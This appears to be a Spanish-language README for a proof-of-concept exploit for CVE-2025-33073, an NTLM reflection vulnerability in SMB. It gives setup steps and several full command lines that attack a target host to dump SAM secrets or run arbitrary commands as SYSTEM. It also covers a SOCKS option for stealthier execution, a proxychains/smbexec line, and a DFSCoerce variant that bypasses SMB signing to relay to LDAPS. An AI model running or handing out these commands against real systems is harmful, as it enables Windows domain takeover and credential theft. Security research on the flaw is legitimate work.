
PoC Exploit para la vulnerabilidad SMB de reflexión NTLM.
Exploit PoC para la vulnerabilidad de reflexión NTLM en SMB.
Todo el crédito va para la investigación oficial:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
SO: Kali Linux (tiene la mayoría de los paquetes preinstalados).
La herramienta usará automáticamente un entorno virtual. Para configurarlo, ejecuta:
./setup.sh
Esto creará un entorno virtual e instalará todas las dependencias necesarias, incluida ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Comando personalizado
En lugar de ejecutar secretsdump, se puede ejecutar un comando personalizado.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Para una ejecución más sigilosa de comandos después de haber establecido una conexión válida como SYSTEM. Aquí --target y --target-ip deben ser iguales.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
También se puede ejecutar un comando personalizado a través de proxychains en lugar de volcar SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Se ha realizado una investigación para comprobar si la reflexión realmente no funcionaba con la firma SMB habilitada, lo que llevó a encontrar fallos en los que, si se eliminan SIGN/SEAL del paquete, es posible reenviar desde SMB a LDAPS, algo que normalmente no es posible debido al MIC.
Gracias a:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Si estás en el mismo dominio de difusión que el dispositivo y es vulnerable al envenenamiento LLMNR, es posible explotar un dispositivo sin tener que registrar un registro DNS.

La autenticación NTLM local tiene lugar

La autenticación NTLM local no tiene lugar, lo que resulta en un intento FAILED

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073